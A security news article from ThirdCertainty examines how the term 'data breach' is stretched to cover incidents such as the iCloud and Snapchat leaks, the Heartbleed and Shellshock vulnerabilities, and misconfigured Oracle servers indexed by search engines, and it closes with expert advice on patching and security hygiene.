Why the meaning of ‘data breach’ is in flux

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInEmail this to someonePrint this page

By Byron Aco­hi­do, ThirdCertainty

Data breach­es. Vulnerabilities.

These terms have entered our lex­i­con. But what exact­ly do they refer to?

Recent news events show that we are in a peri­od where the ter­mi­nol­o­gy we use to refer to secu­ri­ty short­falls is in flux.

Tar­get, Home Depot and JPMor­gan Chase clear­ly suf­fered major data breach­es. So did Apple’s iCloud, Drop­box and Snapchat. Or so we thought.

Apple, Drop­box and Snapchat have refut­ed being direct­ly hacked. And strict­ly speak­ing, each is right. Hack­ers may have sniffed Hol­ly­wood A-lis­ters’ iCloud user­name and pass­word over an open WiFi net­work at a celebri­ty event. And data appar­ent­ly was leaked from third-par­ty apps that pig­gy­back onto Drop­box and Snapchat.

The dis­tinc­tion here is that the par­ent company’s data bases were not direct­ly com­pro­mised. In the case of iCloud, the celebri­ty users may have exposed them­selves by not pay­ing clos­er atten­tion to their dig­i­tal foot­prints. And in the case of Drop­box and Snapchat, the breach occurred at the wild and wooly col­lec­tion of third par­ty apps that tie into the big name services.

Sim­i­lar­ly, Heart­bleed and Shell­shock are two of the nas­ti­est Inter­net-wide vul­ner­a­bil­i­ties ever to come to light. Heart­bleed expos­es the OpenSSL pro­to­cols wide­ly used by web­site shop­ping carts. And Shell­shock enables a hack­er to take con­trol of the mod­ule used to type text-based com­mands on Lin­ux , Unix and Mac servers.

More: 3 steps for fig­ur­ing out if your busi­ness is secure

But what exact­ly was it that allowed eth­i­cal hack­er Bryan Seely, of Seely Secu­ri­ty,  to access giant bond insur­er MBIA’s cus­tomer finan­cial accounts? Seely told Third­Cer­tain­ty he also has been able to tap into the Inter­net-fac­ing Ora­cle servers of at least 8,000 oth­er large orga­ni­za­tions, includ­ing two Ivy League schools.

So was it one of these Inter­net-wide vul­ner­a­bil­i­ties that Seely manip­u­lat­ed? Not at all. Seely sim­ply dis­cov­ered that each orga­ni­za­tion mis­con­fig­ured Ora­cle serv­er soft­ware in a way that allowed the servers to be indexed—and thus made searchable—by Google and the Shodan search engine.

Con­fus­ing context

The impli­ca­tions of this are pro­found. It means any­one who takes the time to learn the fin­er points of con­duct­ing Google and Shodan search­es can find and access mis­con­fig­ured Ora­cle servers at thou­sands of clue­less organizations.

Our lex­i­con doesn’t have enough words to describe every fla­vor of infor­ma­tion com­pro­mise, so we call every such inci­dent a breach,” says Tal Klein, vice pres­i­dent of strat­e­gy at cloud secu­ri­ty com­pa­ny Adal­lom. “This is a huge prob­lem because it makes it very hard for the aver­age per­son to under­stand exact­ly what their per­son­al risk is in the con­text of each event.”

Our net­works are get­ting ever more com­plex. Mean­while, emerg­ing threats are expand­ing and inten­si­fy­ing. In this mix, poor secu­ri­ty prac­tices remain the rule, not the excep­tion. IBM Secu­ri­ty Ser­vices’ 2014 Cyber Secu­ri­ty Intel­li­gence Index shows human error to be a con­tribut­ing fac­tor in 95 per­cent of secu­ri­ty inci­dents. That includes mis­con­fig­u­ra­tions, lax patch man­age­ment and use of weak passwords.

Mean­while, no one in the secu­ri­ty com­mu­ni­ty expects dis­cov­er­ies of seri­ous design flaws—known as zero-day vulnerabilities—to slow down any time soon.

All soft­ware is bug­gy and vul­ner­a­ble. Devel­op­ers are under pres­sure to deliv­er more, faster so they take short­cuts and make mis­takes,” says Chris Goet­tl, prin­ci­pal man­ag­er at vul­ner­a­bil­i­ty man­age­ment firm Shav­lik. “The real­i­ty is that vul­ner­a­bil­i­ties like the Heart­bleed and Shell­shock exist because soft­ware is only as secure as we can make it.”

Indeed, Heart­bleed and Shell­shock show how pro­gram­ming deci­sions made a decade ago, before social media and the Inter­net of Things, now trans­late into fresh turf for a will­ing and able cyber underground.

Shell­shock attacks

Since the ini­tial Shell­shock vul­ner­a­bil­i­ty was report­ed Sept. 24, web­site secu­ri­ty ven­dor Incap­su­la has blocked more than 310,000 attempts to exploit the Shell­shock flaw on its clients’ web­sites, at one point as many as 1,860 attacks per hour.

Only 6 per­cent of that traf­fic appeared to be legit­i­mate secu­ri­ty scans. “An over­whelm­ing 94 per­cent was some form of attack,” says Incap­su­la co-founder Marc Gaffan. “Specif­i­cal­ly, these were scans by hack­ers, serv­er high­jack attempts, and DDoS mal­ware seed­ing. The high­jack attempts were the most imme­di­ate­ly trou­bling, com­pris­ing about 20 per­cent of the total.”

Probes to take advan­tage of Heart­bleed and Shell­shock have the ear­marks of being backed by orga­nized crime. There is anoth­er tier of much less sophis­ti­cat­ed thieves and pranksters hav­ing a grand time prob­ing weak­ness­es aris­ing from the mish­mash of part­ner­ships and shar­ing atten­dant to social media ser­vices, such as iCloud, Drop­box and Snapchat.

Adallom’s Klein argues that com­pa­ny owners—and con­sumers, celebri­ties included—need to share the bur­den of pre­serv­ing security.

Use com­mon sense. Guard you sen­si­tive data and pho­tos. Don’t give sweep­ing per­mis­sions to triv­ial apps. Don’t use the same user­name and pass­word on mul­ti­ple accounts.

And if you run a busi­ness, engrain secu­ri­ty into your busi­ness plan. Advis­es Klein: “Start being strate­gic about vul­ner­a­bil­i­ty mit­i­ga­tion; per­form an audit of open source tech­nolo­gies your infra­struc­ture is built on; have good patch­ing hygiene as a defac­to stan­dard; assign engi­neer­ing resources to par­tic­i­pate in the devel­op­ment and main­te­nance of these projects.”

More on emerg­ing threats

Shell­shock bug expos­es web servers, home routers

Insid­ers pose risk of theft, fines, sabotage

Why deb­it cards are riski­er than cred­it cards


Posted in Cybersecurity, Data Breach, News & Analysis